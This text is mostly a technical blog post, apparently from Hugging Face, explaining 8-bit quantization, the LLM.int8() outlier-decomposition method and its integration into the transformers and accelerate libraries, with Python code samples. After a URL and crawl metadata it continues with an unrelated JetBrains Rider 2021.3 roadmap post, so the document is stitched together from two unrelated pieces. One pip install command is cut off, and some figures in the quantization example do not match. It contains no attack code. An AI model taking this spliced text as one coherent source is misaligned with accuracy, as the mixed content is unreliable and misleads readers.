In the Ampere architecture, NVIDIA also introduced TensorFloat-32 (TF32) precision format, combining the dynamic range of BF16 and precision of FP16 to only use 19 bits. It's currently only used internally during certain operations.
In the machine learning jargon FP32 is called full precision (4 bytes), while BF16 and FP16 are referred to as half-precision (2 bytes). On top of that, the int8 (INT8) data type consists of an 8-bit representation that can store 2^8 different values (between [0, 255] or [-128, 127] for signed integers).
While, ideally the training and inference should be done in FP32, it is two times slower than FP16/BF16 and therefore a mixed precision approach is used where the weights are held in FP32 as a precise "main weights" refrence, while computation in a forward and backward pass are done for FP16/BF16 to enhance training speed. The FP16/BF16 gradients are then used to update the FP32 main weights.
During training, the main weights are always stored in FP32, but in practice, the half-precision weights often provide similar quality during inference as their FP32 counterpart -- a precise reference of the model is only needed when it receives multiple gradient updates. This means we can use the half-precision weights and use half the GPUs to accomplish the same outcome.
To calculate the model size in bytes, one multiplies the number of parameters by the size of the chosen precision in bytes. For example, if we use the bfloat16 version of the BLOOM-176B model, we have
176*10**9 x 2 bytes = 352GB! As discussed earlier, this is quite a challenge to fit into a few GPUs.
But what if we can store those weights with less memory using a different data type? A methodology called quantization has been used widely in Deep Learning.
Introduction to model quantization
Experimentially, we have discovered that instead of using the 4-byte FP32 precision, we can get an almost identical inference outcome with 2-byte BF16/FP16 half-precision, which halves the model size. It'd be amazing to cut it further, but the inference quality outcome starts to drop dramatically at lower precision.
To remediate that, we introduce 8-bit quantization. This method uses a quarter precision, thus needing only 1/4th of the model size! But it's not done by just dropping another half of the bits.
Quantization is done by essentially “rounding” from one data type to another. For example, if one data type has the range 0..9 and another 0..4, then the value “4” in the first data type would be rounded to “2” in the second data type. However, if we have the value “3” in the first data type, it lies between 1 and 2 of the second data type, then we would usually round to “2”. This shows that both values “4” and “3” of the first data type have the same value “2” in the second data type. This highlights that quantization is a noisy process that can lead to information loss, a sort of lossy compression.
The two most common 8-bit quantization techniques are zero-point quantization and absolute maximum (absmax) quantization. Zero-point quantization and absmax quantization map the floating point values into more compact int8 (1 byte) values. First, these methods normalize the input by scaling it by a quantization constant.
For example, in zero-point quantization, if my range is -1.0…1.0 and I want to quantize into the range -127…127, I want to scale by the factor of 127 and then round it into the 8-bit precision. To retrieve the original value, you would need to divide the int8 value by that same quantization factor of 127. For example, the value 0.3 would be scaled to
0.3*127 = 38.1. Through rounding, we get the value of 38. If we reverse this, we get
38/127=0.2992 – we have a quantization error of 0.008 in this example. These seemingly tiny errors tend to accumulate and grow as they get propagated through the model’s layers and result in performance degradation.
(Image taken from: this blogpost )
Now let's look at the details of absmax quantization. To calculate the mapping between the fp16 number and its corresponding int8 number in absmax quantization, you have to first divide by the absolute maximum value of the tensor and then multiply by the total range of the data type.
For example, let's assume you want to apply absmax quantization in a vector that contains
[1.2, -0.5, -4.3, 1.2, -3.1, 0.8, 2.4, 5.4]. You extract the absolute maximum of it, which is
5.4 in this case. Int8 has a range of
[-127, 127], so we divide 127 by
5.4 and obtain
23.5 for the scaling factor. Therefore multiplying the original vector by it gives the quantized vector
[28, -12, -101, 28, -73, 19, 56, 127].
To retrieve the latest, one can just divide in full precision the int8 number with the quantization factor, but since the result above is "rounded" some precision will be lost.
For an unsigned int8, we would subtract the minimum and scale by the absolute maximum. This is close to what zero-point quantization does. It's is similar to a min-max scaling but the latter maintains the value scales in such a way that the value “0” is always represented by an integer without any quantization error.
These tricks can be combined in several ways, for example, row-wise or vector-wise quantization, when it comes to matrix multiplication for more accurate results. Looking at the matrix multiplication, A*B=C, instead of regular quantization that normalize by a absolute maximum value per tensor, vector-wise quantization finds the absolute maximum of each row of A and each column of B. Then we normalize A and B by dividing these vectors. We then multiply A*B to get C. Finally, to get back the FP16 values, we denormalize by computing the outer product of the absolute maximum vector of A and B. More details on this technique can be found in the LLM.int8() paper or in the blog post about quantization and emergent features on Tim's blog.
While these basic techniques enable us to quanitize Deep Learning models, they usually lead to a drop in accuracy for larger models. The LLM.int8() implementation that we integrated into Hugging Face Transformers and Accelerate libraries is the first technique that does not degrade performance even for large models with 176B parameters, such as BLOOM.
A gentle summary of LLM.int8(): zero degradation matrix multiplication for Large Language Models
In LLM.int8(), we have demonstrated that it is crucial to comprehend the scale-dependent emergent properties of transformers in order to understand why traditional quantization fails for large models. We demonstrate that performance deterioration is caused by outlier features, which we explain in the next section. The LLM.int8() algorithm itself can be explain as follows.
In essence, LLM.int8() seeks to complete the matrix multiplication computation in three steps:
- From the input hidden states, extract the outliers (i.e. values that are larger than a certain threshold) by column.
- Perform the matrix multiplication of the outliers in FP16 and the non-outliers in int8.
- Dequantize the non-outlier results and add both outlier and non-outlier results together to receive the full result in FP16.
These steps can be summarized in the following animation:
The importance of outlier features
A value that is outside the range of some numbers' global distribution is generally referred to as an outlier. Outlier detection has been widely used and covered in the current literature, and having prior knowledge of the distribution of your features helps with the task of outlier detection. More specifically, we have observed that classic quantization at scale fails for transformer-based models >6B parameters. While large outlier features are also present in smaller models, we observe that a certain threshold these outliers from highly systematic patterns across transformers which are present in every layer of the transformer. For more details on these phenomena see the LLM.int8() paper and emergent features blog post.
As mentioned earlier, 8-bit precision is extremely constrained, therefore quantizing a vector with several big values can produce wildly erroneous results. Additionally, because of a built-in characteristic of the transformer-based architecture that links all the elements together, these errors tend to compound as they get propagated across multiple layers. Therefore, mixed-precision decomposition has been developed to facilitate efficient quantization with such extreme outliers. It is discussed next.
Inside the MatMul
Once the hidden states are computed we extract the outliers using a custom threshold and we decompose the matrix into two parts as explained above. We found that extracting all outliers with magnitude 6 or greater in this way recoveres full inference performance. The outlier part is done in fp16 so it is a classic matrix multiplication, whereas the 8-bit matrix multiplication is done by quantizing the weights and hidden states into 8-bit precision using vector-wise quantization -- that is, row-wise quantization for the hidden state and column-wise quantization for the weight matrix. After this step, the results are dequantized and returned in half-precision in order to add them to the first matrix multiplication.
What does 0 degradation mean?
How can we properly evaluate the performance degradation of this method? How much quality do we lose in terms of generation when using 8-bit models?
We ran several common benchmarks with the 8-bit and native models using lm-eval-harness and reported the results.
For OPT-175B:
For BLOOM-176:
We indeed observe 0 performance degradation for those models since the absolute difference of the metrics are all below the standard error (except for BLOOM-int8 which is slightly better than the native model on lambada). For a more detailed performance evaluation against state-of-the-art approaches, take a look at the paper!
Is it faster than native models?
The main purpose of the LLM.int8() method is to make large models more accessible without performance degradation. But the method would be less useful if it is very slow. So we benchmarked the generation speed of multiple models. We find that BLOOM-176B with LLM.int8() is about 15% to 23% slower than the fp16 version – which is still quite acceptable. We found larger slowdowns for smaller models, like T5-3B and T5-11B. We worked hard to speed up these small models. Within a day, we could improve inference per token from 312 ms to 173 ms for T5-3B and from 45 ms to 25 ms for T5-11B. Additionally, issues were already identified, and LLM.int8() will likely be faster still for small models in upcoming releases. For now, the current numbers are in the table below.
The 3 models are BLOOM-176B, T5-11B and T5-3B.
Hugging Face
transformers integration nuances
Next let's discuss the specifics of the Hugging Face
transformers integration. Let's look at the usage and the common culprit you may encounter while trying to set things up.
Usage
The module responsible for the whole magic described in this blog post is called
Linear8bitLt and you can easily import it from the
bitsandbytes library. It is derived from a classic
torch.nn Module and can be easily used and deployed in your architecture with the code described below.
Here is a step-by-step example of the following use case: let's say you want to convert a small model in int8 using
bitsandbytes.
- First we need the correct imports below!
import torch import torch.nn as nn import bitsandbytes as bnb from bnb.nn import Linear8bitLt
- Then you can define your own model. Note that you can convert a checkpoint or model of any precision to 8-bit (FP16, BF16 or FP32) but, currently, the input of the model has to be FP16 for our Int8 module to work. So we treat our model here as a fp16 model.
fp16_model = nn.Sequential( nn.Linear(64, 64), nn.Linear(64, 64) )
- Let's say you have trained your model on your favorite dataset and task! Now time to save the model:
[... train the model ...] torch.save(fp16_model.state_dict(), "model.pt")
- Now that your
state_dictis saved, let us define an int8 model:
int8_model = nn.Sequential( Linear8bitLt(64, 64, has_fp16_weights=False), Linear8bitLt(64, 64, has_fp16_weights=False) )
Here it is very important to add the flag
has_fp16_weights. By default, this is set to
True which is used to train in mixed Int8/FP16 precision. However, we are interested in memory efficient inference for which we need to use
has_fp16_weights=False.
- Now time to load your model in 8-bit!
int8_model.load_state_dict(torch.load("model.pt")) int8_model = int8_model.to(0) # Quantization happens here
Note that the quantization step is done in the second line once the model is set on the GPU. If you print
int8_model[0].weight before calling the
.to function you get:
int8_model[0].weight Parameter containing: tensor([[ 0.0031, -0.0438, 0.0494, ..., -0.0046, -0.0410, 0.0436], [-0.1013, 0.0394, 0.0787, ..., 0.0986, 0.0595, 0.0162], [-0.0859, -0.1227, -0.1209, ..., 0.1158, 0.0186, -0.0530], ..., [ 0.0804, 0.0725, 0.0638, ..., -0.0487, -0.0524, -0.1076], [-0.0200, -0.0406, 0.0663, ..., 0.0123, 0.0551, -0.0121], [-0.0041, 0.0865, -0.0013, ..., -0.0427, -0.0764, 0.1189]], dtype=torch.float16)
Whereas if you print it after the second line's call you get:
int8_model[0].weight Parameter containing: tensor([[ 3, -47, 54, ..., -5, -44, 47], [-104, 40, 81, ..., 101, 61, 17], [ -89, -127, -125, ..., 120, 19, -55], ..., [ 82, 74, 65, ..., -49, -53, -109], [ -21, -42, 68, ..., 13, 57, -12], [ -4, 88, -1, ..., -43, -78, 121]], device='cuda:0', dtype=torch.int8, requires_grad=True)
The weights values are "truncated" as we have seen when explaining quantization in the previous sections. Also, the values seem to be distributed between [-127, 127]. You might also wonder how to retrieve the FP16 weights in order to perform the outlier MatMul in fp16? You can simply do:
(int8_model[0].weight.CB * int8_model[0].weight.SCB) / 127
And you will get:
tensor([[ 0.0028, -0.0459, 0.0522, ..., -0.0049, -0.0428, 0.0462], [-0.0960, 0.0391, 0.0782, ..., 0.0994, 0.0593, 0.0167], [-0.0822, -0.1240, -0.1207, ..., 0.1181, 0.0185, -0.0541], ..., [ 0.0757, 0.0723, 0.0628, ..., -0.0482, -0.0516, -0.1072], [-0.0194, -0.0410, 0.0657, ..., 0.0128, 0.0554, -0.0118], [-0.0037, 0.0859, -0.0010, ..., -0.0423, -0.0759, 0.1190]], device='cuda:0')
Which is close enough to the original FP16 values (2 print outs up)!
- Now you can safely infer using your model by making sure your input is on the correct GPU and is in FP16:
input_ = torch.randn(64, dtype=torch.float16) hidden_states = int8_model(input_.to(torch.device('cuda', 0)))
As a side note, you should be aware that these modules differ slightly from the
nn.Linear modules in that their parameters come from the
bnb.nn.Int8Params class rather than the
nn.Parameter class. You'll see later that this presented an additional obstacle on our journey!
Now the time has come to understand how to integrate that into the
transformers library!
accelerate is all you need
When working with huge models, the
accelerate library includes a number of helpful utilities. The
init_empty_weights method is especially helpful because any model, regardless of size, may be initialized with this method as a context manager without allocating any memory for the model weights.
import torch.nn as nn from accelerate import init_empty_weights with init_empty_weights(): model = nn.Sequential([nn.Linear(100000, 100000) for _ in range(1000)]) # This will take ~0 RAM!
The initialized model will be put on PyTorch's
meta device, an underlying mechanism to represent shape and dtype without allocating memory for storage. How cool is that?
Initially, this function is called inside the
.from_pretrained function and overrides all parameters to
torch.nn.Parameter. This would not fit our requirement since we want to keep the
Int8Params class in our case for
Linear8bitLt modules as explained above. We managed to fix that on the following PR that modifies:
module._parameters[name] = nn.Parameter(module._parameters[name].to(torch.device("meta")))
to
param_cls = type(module._parameters[name]) kwargs = module._parameters[name].__dict__ module._parameters[name] = param_cls(module._parameters[name].to(torch.device("meta")), **kwargs)
Now that this is fixed, we can easily leverage this context manager and play with it to replace all
nn.Linear modules to
bnb.nn.Linear8bitLt at no memory cost using a custom function!
def replace_8bit_linear(model, threshold=6.0, module_to_not_convert="lm_head"): for name, module in model.named_children(): if len(list(module.children())) > 0: replace_8bit_linear(module, threshold, module_to_not_convert) if isinstance(module, nn.Linear) and name != module_to_not_convert: with init_empty_weights(): model._modules[name] = bnb.nn.Linear8bitLt( module.in_features, module.out_features, module.bias is not None, has_fp16_weights=False, threshold=threshold, ) return model
This function recursively replaces all
nn.Linear layers of a given model initialized on the
meta device and replaces them with a
Linear8bitLt module. The attribute
has_fp16_weights has to be set to
False in order to directly load the weights in
int8 together with the quantization statistics.
We also discard the replacement for some modules (here the
lm_head) since we want to keep the latest in their native precision for more precise and stable results.
But it isn't over yet! The function above is executed under the
init_empty_weights context manager which means that the new model will be still in the
meta device.
For models that are initialized under this context manager,
accelerate will manually load the parameters of each module and move them to the correct devices.
In
bitsandbytes, setting a
Linear8bitLt module's device is a crucial step (if you are curious, you can check the code snippet here) as we have seen in our toy script.
Here the quantization step fails when calling it twice. We had to come up with an implementation of
accelerate's
set_module_tensor_to_device function (termed as
set_module_8bit_tensor_to_device) to make sure we don't call it twice. Let's discuss this in detail in the section below!
Be very careful on how to set devices with
accelerate
Here we played a very delicate balancing act with the
accelerate library!
Once you load your model and set it on the correct devices, sometimes you still need to call
set_module_tensor_to_device to dispatch the model with hooks on all devices. This is done inside the
dispatch_model function from
accelerate, which involves potentially calling
.to several times and is something we want to avoid.
2 Pull Requests were needed to achieve what we wanted! The initial PR proposed here broke some tests but this PR successfully fixed everything!
Wrapping it all up
Therefore the ultimate recipe is:
- Initialize a model in the
metadevice with the correct modules
- Set the parameters one by one on the correct GPU device and make sure you never do this procedure twice!
- Put new keyword arguments in the correct place everywhere, and add some nice documentation
- Add very extensive tests! Check our tests here for more details This may sound quite easy, but we went through many hard debugging sessions together, often times involving CUDA kernels!
All said and done, this integration adventure was very fun; from deep diving and doing some "surgery" on different libraries to aligning everything and making it work!
Now time to see how to benefit from this integration and how to successfully use it in
transformers!
How to use it in
transformers
Hardware requirements
8-bit tensor cores are not supported on the CPU. bitsandbytes can be run on 8-bit tensor core-supported hardware, which are Turing and Ampere GPUs (RTX 20s, RTX 30s, A40-A100, T4+). For example, Google Colab GPUs are usually NVIDIA T4 GPUs, and their latest generation of GPUs does support 8-bit tensor cores. Our demos are based on Google Colab so check them out below!
Installation
Just install the latest version of the libraries using the commands below (make sure that you are using python>=3.8) and run the commands below to try out
pip install accelerate pip install bitsandbytes pip install git+
Example demos - running T5 11b on a Google Colab
Check out the Google Colab demos for running 8bit models on a BLOOM-3B model!
Here is the demo for running T5-11B. The T5-11B model checkpoint is in FP32 which uses 42GB of memory and does not fit on Google Colab. With our 8-bit modules it only uses 11GB and fits easily:
Or this demo for BLOOM-3B:
Scope of improvements
This approach, in our opinion, greatly improves access to very large models. With no performance degradation, it enables users with less compute to access models that were previously inaccessible. We've found several areas for improvement that can be worked on in the future to make this method even better for large models!
Faster inference speed for smaller models
As we have seen in the the benchmarking section, we could improve the runtime speed for small model (<=6B parameters) by a factor of almost 2x. However, while the inference speed is robust for large models like BLOOM-176B there are still improvements to be had for small models. We already identified the issues and likely recover same performance as fp16, or get small speedups. You will see these changes being integrated within the next couple of weeks.
Support for Kepler GPUs (GTX 1080 etc)
While we support all GPUs from the past four years, some old GPUs like GTX 1080 still see heavy use. While these GPUs do not have Int8 tensor cores, they do have Int8 vector units (a kind of "weak" tensor core). As such, these GPUs can also experience Int8 acceleration. However, it requires a entire different stack of software for fast inference. While we do plan to integrate support for Kepler GPUs to make the LLM.int8() feature more widely available, it will take some time to realize this due to its complexity.
Saving 8-bit state dicts on the Hub
8-bit state dicts cannot currently be loaded directly into the 8-bit model after being pushed on the Hub. This is due to the fact that the statistics (remember
weight.CB and
weight.SCB) computed by the model are not currently stored or taken into account inside the state dict, and the
Linear8bitLt module does not support this feature yet.
We think that having the ability to save that and push it to the Hub might contribute to greater accessibility.
CPU support
CPU devices do not support 8-bit cores, as was stated at the beginning of this blogpost. Can we, however, get past that? Running this module on CPUs would also significantly improve usability and accessibility.
Scaling up on other modalities
Currently, language models dominate very large models. Leveraging this method on very large vision, audio, and multi-modal models might be an interesting thing to do for better accessibility in the coming years as these models become more accessible.
Credits
Huge thanks to the following who contributed to improve the readability of the article as well as contributed in the integration procedure in
transformers (listed in alphabetic order):
JustHeuristic (Yozh),
Michael Benayoun,
Stas Bekman,
Steven Liu,
Sylvain Gugger,
Tim Dettmers | https://huggingface.co/blog/hf-bitsandbytes-integration | CC-MAIN-2022-40 | refinedweb | 4,613 | 55.13 |
Arch Space
Description
The Space tool allows you to define an empty volume, either by basing it on a solid shape, or by defining its boundaries, or a mix of both. If it is based solely on boundaries, the volume is calculated by starting from the bounding box of all the given boundaries, and subtracting the spaces behind each boundary. The space object always defines a solid volume. The floor area of a space object, calculated by intersecting a horizontal plane at the center of mass of the space volume, can also be displayed.
Space object created from an existing solid object, then two wall faces are added as boundaries.
How to use
- Select an existing solid object, or faces on boundary objects.
- Press the
Arch Space button, or press S, P keys.
Limitations
- The boundaries properties is currently not editable via GUI.
- See the forum announcement.
Properties
- DATABase: The base object, if any (must be a solid)
- DATABoundaries: A list of optional boundary elements
- DATAArea: The computed floor area of this space
- DATAFinishFloor: The finishing of the floor of this space
- DATAFinishWalls: The finishing of the walls of this space
- DATAFinishCeiling: The finishing of the ceiling of this space
- DATAGroup: Objects that are included inside this space, such as furniture
- DATASpaceType: The type of this space
- DATAFloorThickness: The thickness of the floor finish
- DATANumberOfPeople: The number of people who typically occupy this space
- DATALightingPower: The electric power needed to light this space in Watts
- DATAEquipmentPower: The electric power needed by the equipment of this space in Watts
- DATAAutoPower: If True, Equipment Power will be automatically filled by the equipment included in this space
- DATAConditioning: The type of air conditioning of this space
- DATAInternal: Specifies if this space is internal or external
- VIEWText: The text to show. Use $area, $label, $tag, $floor, $walls, $ceiling to insert the respective data
- VIEWFontName: The name of the font
- VIEWTextColor: The color of the text
- VIEWFontSize: The size of the text
- VIEWFirstLine: The size of the first line of text (multiplies the font size. 1 = same size, 2 = double size, etc..)
- VIEWLineSpacing: The space between the lines of text
- VIEWTextPosition: The position of the text. Leave (0,0,0) for automatic position
- VIEWTextAlign: The justification of the text
- VIEWDecimals: The number of decimals to use for calculated texts
- VIEWShowUnit: Show the unit suffix or not
Options
- To create zones that group several spaces, use a Arch BuildingPart and set its IFC type to "Spatial Zone"
- The space object has the same display modes as other Arch and Part objects, with one more, called Footprint, that displays only the bottom face of the space. introduced in version 0.19
Scripting
See also: Arch API and FreeCAD Scripting Basics.
The Space tool can be used in macros and from the Python console by using the following function:
Space = makeSpace(objects=None, baseobj=None, name="Space")
- Creates a
Spaceobject from the given
objectsor
baseobj, which can be
- one document object, in which case it becomes the base shape of the space object, or
- a list of selection objects as returned by
FreeCADGui.Selection.getSelectionEx(), or
- a list of tuples
(object, subobjectname)
Example:
import FreeCAD, Arch Box = FreeCAD.ActiveDocument.addObject("Part::Box", "Box") Box.Length = 1000 Box.Width = 1000 Box.Height = 1000 Space = Arch.makeSpace(Box) Space.ViewObject.LineWidth = 2 FreeCAD.ActiveDocument.recompute()
After a space object is created, selected faces can be added to it with the following code:
import FreeCAD, FreeCADGui, Draft, Arch points = [FreeCAD.Vector(-500, 0, 0), FreeCAD.Vector(1000, 1000, 0)] Line = Draft.makeWire(points) Wall = Arch.makeWall(Line, width=150, height=2000) FreeCAD.ActiveDocument.recompute() # Select a face of the wall selection = FreeCADGui.Selection.getSelectionEx() Arch.addSpaceBoundaries(Space, selection)
Boundaries can also be removed, again by selecting the indicated faces:
selection = FreeCADGui.Selection.getSelectionEx() Arch.removeSpaceBoundaries(Space, selection)
- | https://www.freecadweb.org/wiki/index.php?title=Arch_Space | CC-MAIN-2019-30 | refinedweb | 636 | 51.38 |
Mapping Geo Data¶
Bokeh has started adding support for working with Geographical data. There are a number of powerful features already available, but we still have more to add. Please tell use your use cases through the mailing list or on github so that we can continue to build out these features to meet your needs.
GeoJSON Datasource¶
GeoJSON is a popular open standard for representing geographical features with JSON. It describes points, lines and polygons (called Patches in Bokeh) as a collection of features. Each feature can also have a set of properties.
Bokeh’s
GeoJSONDataSource can be used almost seamlessly in place of Bokeh’s
ColumnDataSource. For example:
from bokeh.io import output_file, show from bokeh.models import GeoJSONDataSource from bokeh.plotting import figure from bokeh.sampledata.sample_geojson import geojson geo_source = GeoJSONDataSource(geojson=geojson) p = figure() p.circle(x='x', y='y', alpha=0.9, source=geo_source) output_file("geojson.html") show(p)
The important thing to know is that behind the scenes, Bokeh converts the GeoJSON coordinates into columns called x and y (z where appropriate) or xs and ys depending on whether the features are Points, Lines, MultiLines, Polygons or MultiPolygons. Properties with clashing names will be overridden when the GeoJSON is converted, so the following code would not behave as expected.
Warning
If your GeoJSON properties contain a property x and you want to use this to set the size of your circles, and you do this:
Antipattern this will not work.
p.circle(size='x', alpha=0.9, source=geo_source)
You will not get the plot you expect because this is equivalent to
p.circle(x='x', y='y', size='x', alpha=0.9, source=geo_source)
and the x value from your properties will be overridden with the longitude values from your geometry coordinates.
Google Maps support¶
With the GMapPlot, you can plot any bokeh glyphs over a Google Map.
from bokeh.io import output_file, show from bokeh.models import ( GMapPlot, GMapOptions, ColumnDataSource, Circle, Range1d, PanTool, WheelZoomTool, BoxSelectTool ) map_options = GMapOptions(lat=30.29, lng=-97.73, map_type="roadmap", zoom=11) plot = GMapPlot(x_range=Range1d(), y_range=Range1d(), map_options=map_options) plot.title.text = "Austin" # For GMaps to function, Google requires you obtain and enable an API key: # # # # Replace the value below with your personal API key: plot.api_key = "GOOGLE_API_KEY" source = ColumnDataSource( data=dict( lat=[30.29, 30.20, 30.29], lon=[-97.70, -97.74, -97.78], ) ) circle = Circle(x="lon", y="lat", size=15, fill_color="blue", fill_alpha=0.8, line_color=None) plot.add_glyph(source, circle) plot.add_tools(PanTool(), WheelZoomTool(), BoxSelectTool()) output_file("gmap_plot.html") show(plot)
Warning
There is an open issue documenting points appearing to be ~10px off from their intended location.
Google has its own terms of service for using Google Maps API and any use of Bokeh with Google Maps must be within Google’s Terms of Service
Tile Providers¶
Bokeh plots can also consume XYZ tile services which use the Web Mercator projection. The module
bokeh.tile_providers contains several pre-configured tile sources with appropriate attribution which can be added to a plot using the .add_tile() method.
from bokeh.io import output_file, show from bokeh.plotting import figure from bokeh.tile_providers import STAMEN_TONER bound = 20000000 # meters fig = figure(tools='pan, wheel_zoom', x_range=(-bound, bound), y_range=(-bound, bound)) fig.axis.visible = False fig.add_tile(STAMEN_TONER) output_file("stamen_toner_plot.html") show(fig) | https://docs.bokeh.org/en/0.12.11/docs/user_guide/geo.html | CC-MAIN-2020-34 | refinedweb | 556 | 50.53 |
This is the second part of a tutorial series on building an analytical web application with Cube.js. You can find the first part here..
In this part, we are going to add Funnel Analysis to our application. Funnel Analysis, alongside with Retention Analysis, is vital to analyze behavior across the customer journey. A funnel is a series of events that a user goes through within the app, such as completing an onboarding flow. A user is considered converted through a step in the funnel if she performs the event in the specified order. Calculating how many unique users made each event could show you a conversion rate between each step. It helps you to localize a problem down to a certain stage.
Since our application tracks its own usage, we'll build funnels to show how well users navigate through the funnels usage. Quite meta, right?
Here’s how it looks. You check the live demo here.
Building SQL for Funnels
Just a quick recap of part I—we are collecting data with the Snowplow tracker, storing it in S3, and querying with Athena and Cube.js. Athena is built on Presto, and supports standard SQL. So to build a funnel, we need to write a SQL code. Real-world funnel SQL could be quite complex and slow from a performance perspective. Since we are using Cube.js to organize data schema and generate SQL, we can solve both of these problems.
Cube.js allows the building of packages, which are a collection of reusable data schemas. Some of them are specific for datasets, such as the Stripe Package. Others provide helpful macros for common data transformations. And one of them we're going to use—the Funnels package.
If you are new to Cube.js Data Schema, I strongly recommend you check this or that tutorial first and then come back to learn about the funnels package.
The best way to organize funnels is to create a separate cube for each funnel. We'll use
eventFunnel from the Funnel package. All we need to do is to pass an object with the required properties to the
eventFunnel function.
Check the Funnels package documentation for detailed information about its configuration.
Here is how this config could look. In production applications, you're most likely going to generate Cubes.js schema dynamically. You can read more about how to do it here.
import Funnels from "Funnels";import { eventsSQl, PAGE_VIEW_EVENT, CUSTOM_EVENT } from "./Events.js";cube("FunnelsUsageFunnel", {extends: Funnels.eventFunnel({userId: {sql: `user_id`},time: {sql: `time`},steps: [{name: `viewAnyPage`,eventsView: {sql: `select * from (${eventsSQl}) WHERE event = '${PAGE_VIEW_EVENT}`}},{name: `viewFunnelsPage`,eventsView: {sql: `select * from (${eventsSQl}) WHERE event = '${PAGE_VIEW_EVENT} AND page_title = 'Funnels'`},timeToConvert: "30 day"},{name: `funnelSelected`,eventsView: {sql: `select * from (${eventsSQl}) WHERE event = '${CUSTOM_EVENT} AND se_category = 'Funnels' AND se_action = 'Funnel Selected'`},timeToConvert: "30 day"}]})});
The above, 3-step funnel, describes the user flow from viewing any page, such as the home page, to going to Funnels and then eventually selecting a funnel from the dropdown. We're setting
timeToConvert to 30 days for the 2nd and 3rd steps. This means we give a user a 30 day window to let her complete the target action to make it to the funnel.
In our example app, we generate these configs dynamically. You can check the code on Github here.
Materialize Funnels SQL with Pre-Aggregations
As I mentioned before, there is a built-in way in Cube.js to accelerate queries’ performance.
Cube.js can materialize query results in a table. It keeps them up to date and queries them instead of raw data. Pre-Aggregations can be quite complex, including multi-stage and dependency management. But for our case, the simplest
originalSql pre-aggregation should be enough. It materializes the base SQL for the cube.
Learn more about pre-aggregations here.
import Funnels from 'Funnels';import { eventsSQl, PAGE_VIEW_EVENT, CUSTOM_EVENT } from './Events.js';cube('FunnelsUsageFunnel', {extends: Funnels.eventFunnel({ ... }),preAggregations: {main: {type: `originalSql`}}});
Visualize
There are a lot of way to visualize a funnel. Cube.js is visualization-agnostic, so pick one that works for you and fits well into your app design. In our example app, we use a bar chart from the Recharts library.
The Funnels package generates a cube with
conversions and
conversionsPercent measures, and
steps and
time dimensions. To build a bar chart funnel, we need to query the
conversions measure grouped by the
step dimension. The
time dimension should be used in the filter to allow users to select a specific date range of the funnel.
Here is the code (we are using React and the Cube.js React Client):
import React from "react";import cubejs from "@cubejs-client/core";import { QueryRenderer } from "@cubejs-client/react";import CircularProgress from "@material-ui/core/CircularProgress";import { BarChart, Bar, XAxis, YAxis, CartesianGrid, Tooltip } from "recharts";const cubejsApi = cubejs("YOUR-API-KEI",{ apiUrl: "" });const Funnel = ({ dateRange, funnelId }) => (<QueryRenderercubejsApi={cubejsApi}query={{measures: [`${funnelId}.conversions`],dimensions: [`${funnelId}.step`],filters: [{dimension: `${funnelId}.time`,operator: `inDateRange`,values: dateRange}]}}render={({ resultSet, error }) => {if (resultSet) {return (<BarChartwidth={600}height={300}margin={{ top: 20 }}data={resultSet.chartPivot()}><CartesianGrid strokeDasharray="3 3" /><XAxis dataKey="x" minTickGap={20} /><YAxis /><Tooltip /><Bar dataKey={`${funnelId}.conversions`}</BarChart>);}return "Loading...";}}/>);export default Funnel;
If you run this code in CodeSandbox, you should see something like this.
The above example is connected to the Cube.js backend from our event analytics app.
In the next part, we’ll walk through how to build a dashboard and dynamic query builder, like one in Mixpanel or Amplitude. Part 4 will cover the Retention Analysis. In the final part, we will discuss how to deploy the whole application in the serverless mode to AWS Lambda.
You can check out the full source code of the application here.
And the live demo is available here. | https://statsbot.co/blog/building-open-source-mixpanel-alternative-2/ | CC-MAIN-2021-49 | refinedweb | 964 | 58.38 |
Rider. Remember to also check out our ReSharper 2021.3 roadmap, as some features will magically appear in Rider as well!
- .NET 6 Support – Our plan is to invest significant time and effort in supporting the upcoming release of .NET 6. While development is possible for the .NET 6 Preview in some parts, it is yet to be completed until the final release is done. .NET 6 is the future of .NET, and we want to help developers get there.
- C# 10 Support – This will be done as part of our ReSharper 2021.3 roadmap, but while you’re here: we will work on supporting all the new language features, including constant interpolated strings, record structs, list patterns, global using directives, file-scope namespaces, and many more!
- Windows 11 and macOS Monterey – Like .NET itself, our operating systems are progressing to look more beautiful and be more accessible. We will work on Rider (and IntelliJ IDEA) to blend in nicely with your preferred future operating system.
- Apple M1 Support – Apple’s M1 was a huge thing for some developers. We will be continuing our efforts to give you a consistent experience for this great new ARM-based chip. You can check out our latest Rider 2021.2 Apple Silicon edition already! Just note the list of known issues, and let us know if you experience any new ones.
- Code With Me – Our solution for collaborative coding is still one of our top priorities for the next Rider release. As you may know, Rider already has a unique architecture that mixes the IntelliJ IDEA frontend with the ReSharper backend. Much of this adds to the complexity for the CWM team, but we are hoping to roll out a version of the plugin for Rider as soon as possible!
- New Debugger UI – Our IntelliJ IDEA team is working on a new debugger UI, which Rider will inherit. No details for now, but we hope you’re excited to check this out as soon as it becomes available!
- Multiple Startup Projects – Compound configurations are a great Rider feature (inherited from IntelliJ), but they are missing something important – the ability to run/debug different projects in parallel. We are investigating different options for our next release.
- Problems View – We wrote about adopting the IntelliJ IDEA Problems View in our 2021.1 roadmap. Good news – this feature is merged and ready to go, and we are just about to polish the very last bits for Rider! You will get a chance to see it in the first EAP.
- Debug Windows Docker Containers – For several years, Rider has allowed debugging ASP.NET Core projects inside Linux containers. We are looking forward to bringing you the same experience for Docker Windows containers with the first EAP release.
- F# Support – After the debut of the let postfix template, we will try to add more of them to the list. We will also work to bring parameter info for curried functions and method applications without parentheses, as well as better code completion.
- MAUI – Like most developers, we’ll keep a close eye on the development of Microsoft’s new cross-platform framework for mobile and desktop apps, paying special attention to what Rider can and should do to support it.
- UWP Debugging – Another great feature that’s just waiting to be released in the first EAP! UWP projects will be able to run with the debugger attached from the very beginning, as opposed to having to attach it manually.
- Unreal – Our dedicated IDE – Rider for Unreal Engine – has received absolutely great feedback so far and we will be moving forward wherever possible. One of the notable priorities is to improve Perforce support and provide a Linux version.
- Unity – Rider’s great feature set for Unity will see various improvements, such as proper highlighting for conditionally defined code in package sources. We’ll see updates to USS/UXML with support for variables, the new TSS theme files, and checks to keep the UIElements schema files up to date. We’ll also be processing assets in packages to provide more Code Vision links and usages.
